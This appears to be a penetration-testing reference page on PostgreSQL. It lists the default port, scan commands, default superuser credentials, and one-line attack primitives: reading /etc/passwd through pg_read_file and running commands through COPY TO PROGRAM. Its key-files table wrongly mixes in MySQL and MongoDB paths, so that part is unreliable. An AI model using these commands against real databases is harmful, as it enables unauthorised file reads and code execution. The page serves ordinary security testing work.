PostgreSQL
PostgreSQL, Postgres, PG
PostgreSQL is an advanced open-source database. Weak passwords, exposed `trust` authentication, and remote code execution via `COPY ... TO PROGRAM` are common attack vectors.
Ports
| Port | Protocol | Description |
|---|---|---|
| 5432 | tcp | PostgreSQL |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
| `nmap -sV -p <port> <target>` | Service banner and version info |
| `nc -nv <target> <port>` | Raw banner grab |
Key Files
| Path | Description |
|---|---|
| `/etc/mysql/mysql.cnf` | MySQL client configuration |
| `/var/lib/mysql/mysql/user.MYD` | MySQL user table data |
| `postgresql.conf` | PostgreSQL configuration file |
| `pg_hba.conf` | PostgreSQL client authentication rules |
| `mongod.conf` | MongoDB daemon configuration |
Default Credentials
| Username | Password | Context |
|---|---|---|
| postgres | postgres | Default superuser |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
| — | Auth | trust authentication misconfiguration |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Read File (superuser) | `SELECT pg_read_file('/etc/passwd');` | Read server files |
| COPY RCE | `COPY (select 'rev') TO PROGRAM 'id';` | RCE via COPY TO PROGRAM |
Notes
Always start with a full port scan: `nmap -sV -sC -p- <target>`.
Check for default credentials before brute-forcing.
Use service-specific NSE scripts: `nmap --script <service>-* -p <port> <target>`.
Remember to check both IPv4 and IPv6 if applicable.